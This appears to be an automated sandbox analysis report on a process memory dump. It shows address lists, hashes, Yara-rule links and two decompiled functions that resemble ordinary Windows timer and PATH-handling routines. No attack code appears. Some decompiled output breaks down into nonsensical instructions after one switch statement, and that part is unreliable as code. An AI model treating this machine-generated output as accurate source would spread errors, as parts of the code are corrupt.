0x03674984
0x0367498b
0x0367498d
0x03674991
0x03674993
0x03674999
0x0367499d
0x036749a2
0x036749a2
0x036749a2
0x03674999
0x036749ac
0x00000000
0x036749b3
0x036748f8
0x036748fe
0x00000000
0x00000000
0x00000000
0x036748fe
0x03674895
0x0367489c
0x036748ad
0x036748b2
0x036748b5
0x036748b7
0x036748ba
0x036748bc
0x036748c6
0x036748c6
0x036748cb
0x036748d1
0x036748d4
0x036748d8
0x036748d8
0x00000000
0x036748d8
0x036748be
0x036748c0
0x00000000
0x00000000
0x036748c2
0x00000000
0x00000000
0x00000000
0x036748c4
0x00000000
0x03674882
0x0367487b
0x03674904
0x03674906
0x00000000
0x00000000
0x03674908
0x0367490e
0x00000000
0x00000000
0x03674910
0x03674917
0x03674917
0x00000000
0x03674917
0x0361b1ba
0x036747f9
0x036747fc
0x00000000
0x00000000
0x00000000
0x036747fc
0x0361b1c0
0x0361b1c0
0x0361b1c3
0x0361b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 036748AD

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: f8d8356037fbc18dacf582cdd3cc6a0eae1db758d5122b09feb9270f86e21373
Instruction ID: 7bd1cab2168c09ff1b76f72fe1cf67c783fd07dccb400030bca25c7e452ca997
Opcode Fuzzy Hash: f8d8356037fbc18dacf582cdd3cc6a0eae1db758d5122b09feb9270f86e21373
Instruction Fuzzy Hash: 9251F075D042598FDF32CF65C949BAEBBB4AF04310F5842ADE859AB381DB708981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0363B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0363B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x370d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03637D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E036E8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03659E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0365B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0365CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03637D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E036E8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0365AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3708628; // 0x0
								_v68 = _t77;
								_t78 =  *0x370862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3708628; // 0x0
							_t116 =  *0x370862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0363b94c
0x0363b956
0x0363b95c
0x0363b95e
0x0363b964
0x0363b969
0x0363b96d
0x0363b96d
0x0363b970
0x0363b974
0x0363b97a
0x0363badf
0x0363badf
0x0363bae2
0x0363bae4
0x0363bae6
0x0363baf0
0x03682cb8
0x0363baf6
0x0363baf6
0x0363baf6
0x0363bafd
0x0363bb1f
0x0363bb1f
0x0363baff
0x0363bb00
0x0363bb00
0x0363bb03
0x0363bb03
0x0363bacb
0x0363bacf
0x0363bad0
0x0363bad1
0x0363badc
0x0363badc
0x0363b980
0x0363b980
0x0363b988
0x0363b98b
0x0363b98d
0x0363b990
0x0363b993
0x0363b999
0x0363b99b
0x0363b9a1
0x0363b9a5
0x0363b9aa
0x0363b9b0
0x0363b9bb
0x0363b9c0
0x0363b9c3
0x0363b9ca
0x0363b9cc
0x0363b9cf
0x0363b9d3
0x0363b9d7
0x0363ba94
0x0363ba94
0x0363ba98
0x0363baa3
0x03682ccb
0x0363baa9
0x0363baa9
0x0363baa9
0x0363bab1
0x03682cd5
0x03682cdd
0x03682cdd
0x0363babb
0x0363babc
0x0363bac2
0x0363bac3
0x0363bac3
0x0363bac6
0x00000000
0x0363b9dd
0x0363b9dd
0x0363b9e7
0x0363b9e7
0x0363b9ec
0x0363b9ec
0x0363b9f1
0x0363b9f5
0x0363b9fa
0x0363ba00
0x0363ba0c
0x0363ba10
0x0363ba10
0x0363ba12
0x0363ba18
0x00000000
0x00000000
0x0363bb26
0x0363bb26
0x0363ba1e
0x0363ba1e
0x0363ba23
0x0363ba25
0x0363ba2c
0x0363ba30
0x0363ba35
0x0363ba35
0x0363ba41
0x0363ba46
0x0363ba4c
0x0363ba50
0x0363ba54
0x0363ba6a
0x0363ba6e
0x0363ba70
0x0363ba74
0x0363ba78
0x0363ba7a
0x0363ba7c
0x0363ba8e
0x0363ba90
0x0363ba92
0x0363bb14
0x0363bb14
0x0363bb16
0x0363bb16
0x00000000
0x0363ba7c
0x0363bb0a
0x0363bb0d
0x00000000
0x00000000
0x00000000
0x0363bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0363B9A5

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 529ba5903586938b1acabfb26b2c1a905458389a5cae8ea79a650ad45ac5316d
Instruction ID: 1cc501a865a9cb7852209a6369dd2c53f8493863fb447fa759f1ee824c58280e
Opcode Fuzzy Hash: 529ba5903586938b1acabfb26b2c1a905458389a5cae8ea79a650ad45ac5316d
Instruction Fuzzy Hash: 41514971A08744CFC720DF29C58092AFBE9FB8A710F18896EF98597354DB71E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03642581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E03642581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t243;
				signed int _t247;
				void* _t249;
				signed int _t252;
				signed int _t254;
				intOrPtr _t256;
				signed int _t259;
				signed int _t266;
				signed int _t269;
				signed int _t277;
				intOrPtr _t283;
				signed int _t285;
				signed int _t287;
				void* _t288;
				void* _t289;
				signed int _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				void* _t337;
				signed int _t338;
				signed int _t340;
				signed int _t343;
				void* _t344;
				void* _t347;
				void* _t348;

				_t340 = _t343;
				_t344 = _t343 - 0x4c;
				_v8 =  *0x370d360 ^ _t340;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x370b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t348 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t283 = 0x48;
				_t315 = 0 | _t348 == 0x00000000;
				_t326 = 0;
				_v37 = _t348 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t283 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L03634620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t283);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t283;
							_t285 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x3708478;
								 *_t333 = ((0 | _t315 == 0x03708478) - 0x00000001 & 0xfffffffb) + 7;
								E0365F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t344 = _t344 + 0xc;
								_t285 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t277 = E036A39F2(_t328);
									_t315 = _v32;
									_t328 = _t277;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t287 = _t333 + _t285 * 4;
								_v56 = _t287;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t243 =  *(_v60 + _t299 * 4);
										__eflags = _t243;
										if(_t243 == 0) {
											goto L30;
										} else {
											__eflags = _t243 == 5;
											if(_t243 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t287 =  *(_v60 + _t299 * 4);
										 *(_t287 + 0x18) = _t328;
										_t247 =  *(_v60 + _t299 * 4);
										__eflags = _t247 - 8;
										if(_t247 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t247 * 4 +  &M03642959))) {
												case 0:
													__ax =  *0x3708488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0365F3E0(__edi,  *0x370848c, __ax & 0x0000ffff);
														__eax =  *0x3708488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0365F3E0(_t328, _v80, _v64);
													_t272 = _v64;
													goto L26;
												case 2:
													 *0x3708480 & 0x0000ffff = E0365F3E0(__edi,  *0x3708484,  *0x3708480 & 0x0000ffff);
													__eax =  *0x3708480 & 0x0000ffff;
													__eax = ( *0x3708480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0365F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0365F3E0(_t328, _v76, _v36);
														_t272 = _v36;
													}
													L26:
													_t344 = _t344 + 0xc;
													_t328 = _t328 + (_t272 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t274);
													 *((short*)(_t328 - 2)) = _t274;
													goto L28;
												case 6:
													__ebx =  *0x370575c;
													__eflags = __ebx - 0x370575c;
													if(__ebx != 0x370575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0365F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x370575c;
														} while (__ebx != 0x370575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3708478 & 0x0000ffff = E0365F3E0(__edi,  *0x370847c,  *0x3708478 & 0x0000ffff);
													__eax =  *0x3708478 & 0x0000ffff;
													__eax = ( *0x3708478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E036A39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3706e58 & 0x0000ffff = E0365F3E0(__edi,  *0x3706e5c,  *0x3706e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3706e58 & 0x0000ffff;
													__eax = ( *0x3706e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t287 = _t287 + 4;
													__eflags = _t287;
													_v56 = _t287;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t247 =  *(_v60 + _t326 * 4);
						if(_t247 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t247 * 4 +  &M03642935))) {
							case 0:
								__ax =  *0x3708488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E03642E3E(0,  &_v64);
								_t283 = _t283 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3708480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3708480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0362EEF0(0x37079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0362EB70(__ecx, 0x37079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t221 = _v72;
											__eflags = _t221;
											if(_t221 != 0) {
												L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
											}
											_t222 = _v52;
											__eflags = _t222;
											if(_t222 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
													_t222 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3707b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0362EB70(__ecx, 0x37079a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t340;
										_pop(_t284);
										return E0365B640(_t222, _t284, _v8 ^ _t340, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t279 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t281 = E03642E3E(_t279,  &_v36);
									_t295 = _v36;
									_v76 = _t281;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t283 = _t283 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x3705764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3708478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3708478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3706e58 & 0x0000ffff;
								__eax = ( *0x3706e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t347 = _t344 +  *[fs:esi+0x28] + _t247;
					asm("daa");
					_t249 = _t247 +  *[fs:esi+0x28] +  *[fs:0x1f036426];
					_t288 = 0x25;
					 *((intOrPtr*)(_t288 + _t249 - 0x80)) =  *((intOrPtr*)(_t288 + _t249 - 0x80)) - _t347;
					 *((intOrPtr*)(_t288 + _t249 - 0xa)) =  *((intOrPtr*)(_t288 + _t249 - 0xa)) - _t249;
					asm("daa");
					_t289 = _t288 +  *[fs:esi];
					 *((intOrPtr*)(_t289 + _t249 + 0x4e)) =  *((intOrPtr*)(_t289 + _t249 + 0x4e)) - _t249;
					 *((intOrPtr*)(_t289 + _t249 + 0x5d)) =  *((intOrPtr*)(_t289 + _t249 + 0x5d)) - _t249;
					asm("daa");
					_t291 = 0x64289403;
					_push(0x6428b403);
					_t337 = _t333 +  *0x203685b +  *((intOrPtr*)(_t347 + _t291 * 2));
					_push(0xcccccc03);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x36eff00);
					E0366D08C(_t291, _t328, _t337);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t252 = 0xc0000100;
					} else {
						_v8 = 0;
						_t338 = 0xc0000100;
						_v52 = 0xc0000100;
						_t254 = 4;
						while(1) {
							_v40 = _t254;
							__eflags = _t254;
							if(_t254 == 0) {
								break;
							}
							_t305 = _t254 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x35f1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t269 = E0365E5C0(_a8,  *((intOrPtr*)(_t305 + 0x35f1668)), _t292);
									_t347 = _t347 + 0xc;
									__eflags = _t269;
									if(__eflags == 0) {
										_t338 = E036951BE(_t292,  *((intOrPtr*)(_v48 + 0x35f166c)), _a16, _t329, _t338, __eflags, _a20, _a24);
										_v52 = _t338;
										break;
									} else {
										_t254 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t254 = _t254 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t338;
						__eflags = _t338;
						if(_t338 < 0) {
							__eflags = _t338 - 0xc0000100;
							if(_t338 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t338 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t256 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t256 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t256 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t338 = E03642AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t338;
												__eflags = _t338 - 0xc0000100;
												if(_t338 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t259 = E03626600( *(_t317 + 0x1c));
												__eflags = _t259;
												if(_t259 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t338 = E03642C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t338;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0362EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t338 = _a24;
									_t266 = E03642AE4( &_v36, _a8, _t292, _a16, _a20, _t338);
									_v32 = _t266;
									__eflags = _t266 - 0xc0000100;
									if(_t266 == 0xc0000100) {
										_v32 = E03642C50(_v36, _a8, _t292, _a16, _a20, _t338, 1);
									}
									_v8 = _t329;
									E03642ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t252 = _t338;
					}
					L70:
					return E0366D0D1(_t252);
				}
				L108:
			}

0x03642584
0x03642586
0x03642590
0x03642596
0x03642597
0x03642598
0x03642599
0x0364259e
0x036425a4
0x036425a9
0x036425ac
0x036425ae
0x036425b1
0x036425b2
0x036425b5
0x036425b8
0x036425bb
0x036425bc
0x036425bf
0x036425c2
0x036425c5
0x036425c6
0x036425cb
0x036425ce
0x036425d8
0x036425db
0x036425dd
0x036425de
0x036425e1
0x036425e3
0x036425e9
0x036426da
0x036426da
0x036426dd
0x036426e2
0x03685b56
0x00000000
0x036426e8
0x036426f9
0x036426fb
0x036426fe
0x03642700
0x03685b60
0x00000000
0x03642706
0x03642706
0x0364270a
0x0364270a
0x0364270d
0x03642713
0x03642716
0x03642718
0x0364271c
0x0364271e
0x03685b6c
0x03685b6f
0x03685b7f
0x03685b89
0x03685b8e
0x03685b93
0x03685b96
0x03685b9c
0x03685ba0
0x03685ba3
0x03685bab
0x03685bb0
0x03685bb3
0x03685bb3
0x03685ba3
0x03642724
0x03642726
0x03642729
0x0364272c
0x0364279d
0x0364279d
0x036427a0
0x036427a2
0x00000000
0x0364272e
0x0364272e
0x03642731
0x03642734
0x03642734
0x03642736
0x03685bc1
0x03685bc1
0x03685bc4
0x00000000
0x03685bca
0x03685bca
0x03685bcd
0x00000000
0x03685bd3
0x00000000
0x03685bd3
0x03685bcd
0x0364273c
0x0364273c
0x03642742
0x03642747
0x0364274a
0x0364274d
0x03642750
0x00000000
0x03642756
0x03642756
0x00000000
0x03642902
0x03642908
0x0364290b
0x00000000
0x03642911
0x0364291c
0x03642921
0x00000000
0x03642921
0x00000000
0x00000000
0x03642880
0x03642887
0x0364288c
0x00000000
0x00000000
0x03642805
0x0364280a
0x03642814
0x03642816
0x00000000
0x00000000
0x0364281e
0x03642821
0x03642823
0x00000000
0x03642829
0x03642829
0x03642831
0x0364283c
0x0364283e
0x00000000
0x0364283e
0x00000000
0x00000000
0x0364284e
0x03642850
0x03642851
0x03642854
0x03642857
0x0364285a
0x0364285c
0x0364285d
0x00000000
0x00000000
0x0364275d
0x03642761
0x00000000
0x03642767
0x0364276e
0x03642773
0x03642773
0x03642776
0x03642778
0x0364277e
0x0364277e
0x03642781
0x03642781
0x03642783
0x03642784
0x00000000
0x00000000
0x03685bd8
0x03685bde
0x03685be4
0x03685be6
0x03685be8
0x03685be9
0x03685bee
0x03685bf8
0x03685bff
0x03685c01
0x03685c04
0x03685c07
0x03685c0b
0x03685c0d
0x03685c0d
0x03685c15
0x03685c18
0x03685c1b
0x03685c1b
0x03685c1e
0x00000000
0x00000000
0x036428c3
0x036428c8
0x036428d2
0x036428d4
0x036428d8
0x036428db
0x03685c26
0x03685c28
0x03685c2d
0x03685c2d
0x00000000
0x00000000
0x03685c34
0x03685c36
0x03685c49
0x03685c4e
0x03685c54
0x03685c5b
0x03685c5d
0x03685c60
0x03642788
0x03642788
0x0364278b
0x0364278e
0x0364278e
0x0364278e
0x03642791
0x00000000
0x00000000
0x03642756
0x03642750
0x00000000
0x03642794
0x03642794
0x03642795
0x03642798
0x03642798
0x00000000
0x03642734
0x0364272c
0x03642700
0x036425ef
0x036425ef
0x036425ef
0x036425f2
0x036425f8
0x00000000
0x00000000
0x036425fe
0x00000000
0x036428e6
0x036428ec
0x036428ef
0x036428f5
0x036428f8
0x036428f8
0x00000000
0x036428f8
0x00000000
0x00000000
0x03642866
0x03642866
0x03642876
0x03642879
0x00000000
0x00000000
0x036427e0
0x036427e7
0x036427e9
0x036427eb
0x03685afd
0x00000000
0x03685afd
0x00000000
0x00000000
0x03642633
0x03642638
0x0364263b
0x0364263c
0x0364263e
0x03642640
0x03642642
0x03642647
0x03642649
0x0364264e
0x03642650
0x03642653
0x03642659
0x036426a2
0x036426a7
0x036426ac
0x036426b2
0x03685b11
0x03685b15
0x03685b17
0x00000000
0x036426b8
0x036426b8
0x036426ba
0x036427a6
0x036427a6
0x036427a9
0x036427ab
0x036427b9
0x036427b9
0x036427be
0x036427c1
0x036427c3
0x036427c5
0x036427c7
0x03685c74
0x03685c79
0x03685c79
0x036427c7
0x00000000
0x036426c0
0x036426c0
0x036426c3
0x036426c6
0x036426c6
0x036426c9
0x036426c9
0x00000000
0x036426c9
0x036426ba
0x0364265b
0x0364265b
0x0364265e
0x03642667
0x0364266d
